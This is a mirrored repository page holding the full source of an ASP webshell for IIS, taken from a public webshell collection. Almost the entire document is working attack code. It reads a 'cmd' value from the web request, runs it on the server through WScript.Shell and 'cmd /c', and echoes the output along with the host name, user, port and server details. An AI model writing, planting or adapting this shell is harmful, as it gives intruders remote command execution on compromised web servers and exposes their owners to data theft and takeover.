mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
c9479faa14
from : https://gist.github.com/saveeoo/a8af827510df085f7f1c83208a898098 author : saveeoo
50 lines
1.3 KiB
Text
50 lines
1.3 KiB
Text
<!--
|
|
ASP Webshell
|
|
Working on latest IIS
|
|
Referance :-
|
|
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp
|
|
http://stackoverflow.com/questions/11501044/i-need-execute-a-command-line-in-a-visual-basic-script
|
|
http://www.w3schools.com/asp/
|
|
-->
|
|
|
|
|
|
<%
|
|
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
|
|
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
|
|
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
|
|
Function getCommandOutput(theCommand)
|
|
Dim objShell, objCmdExec
|
|
Set objShell = CreateObject("WScript.Shell")
|
|
Set objCmdExec = objshell.exec(thecommand)
|
|
getCommandOutput = objCmdExec.StdOut.ReadAll
|
|
end Function
|
|
%>
|
|
|
|
|
|
<HTML>
|
|
<BODY>
|
|
<FORM action="" method="GET">
|
|
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
|
|
<input type="submit" value="Run">
|
|
</FORM>
|
|
<PRE>
|
|
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
|
<%Response.Write(Request.ServerVariables("server_name"))%>
|
|
<p>
|
|
<b>The server's port:</b>
|
|
<%Response.Write(Request.ServerVariables("server_port"))%>
|
|
</p>
|
|
<p>
|
|
<b>The server's software:</b>
|
|
<%Response.Write(Request.ServerVariables("server_software"))%>
|
|
</p>
|
|
<p>
|
|
<b>The server's software:</b>
|
|
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
|
|
<% szCMD = request("cmd")
|
|
thisDir = getCommandOutput("cmd /c" & szCMD)
|
|
Response.Write(thisDir)%>
|
|
</p>
|
|
<br>
|
|
</BODY>
|
|
</HTML>
|